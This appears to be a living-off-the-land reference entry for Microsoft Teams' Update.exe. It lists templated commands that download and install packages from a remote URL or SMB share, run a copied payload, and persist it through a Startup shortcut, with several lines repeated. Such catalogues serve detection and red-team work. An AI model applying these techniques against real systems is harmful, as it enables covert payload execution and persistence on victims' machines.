Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
The above binary will go to url and look for RELEASES file and download the nuget package.
Update.exe --download {REMOTEURL}
The above binary will go to url and look for RELEASES file, download and install the nuget package.
Update.exe --update={REMOTEURL}
The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Update.exe --update={PATH_SMB:folder}
The above binary will go to url and look for RELEASES file, download and install the nuget package.
Update.exe --updateRollback={REMOTEURL}
Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"
The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Update.exe --updateRollback={PATH_SMB:folder}
The above binary will go to url and look for RELEASES file, download and install the nuget package.
Update.exe --update={REMOTEURL}
The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Update.exe --update={PATH_SMB:folder}
The above binary will go to url and look for RELEASES file, download and install the nuget package.
Update.exe --updateRollback={REMOTEURL}
The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Update.exe --updateRollback={PATH_SMB:folder}
Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"
Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a shortcut to the specified executable in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
Update.exe --createShortcut={PATH:.exe} -l=Startup
Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
Update.exe --removeShortcut={PATH:.exe}-l=Startup